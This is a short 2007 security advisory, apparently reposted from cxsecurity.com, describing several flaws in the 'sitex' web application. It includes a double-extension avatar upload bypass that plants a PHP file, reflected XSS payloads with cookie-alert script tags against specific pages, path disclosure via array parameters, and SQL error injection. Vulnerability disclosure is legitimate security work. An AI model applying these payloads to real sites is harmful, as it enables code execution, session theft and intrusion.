sitex multiple vulnerabilities

2007-03-08 / 2007-03-09
Credit: none
Risk: High
Local: No
Remote: Yes
CWE: N/A

global risk:critical upload vulnerability: in user profile upload an avatar with a double extension like : file.php.jpg once it's done,you gone get an error like:Fatal error: Call to undefined function imagedestroy() in /. but the last extension (jpg) will be removed by the script, and stored in : /content/avatars has ramdom_numberfile.php xss get : /sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</ script> /sitex/search.php?search=<script>alert(document.cookie)</script> xss via mysql error: /sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie) </script> /calendar_events.php?page='"><script>alert(document.cookie)</script> full path disclosure: /sitex/calendar.php?sxMonth[]=1 /sitex/calendar.php?sxMonth=1&sxYear[]=2007 /calendar_events.php?page[]=1 multiples errors sql : just add a ' on any var .. or on any fields ( like in forum,search,...etc ) regards laurent gaffi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top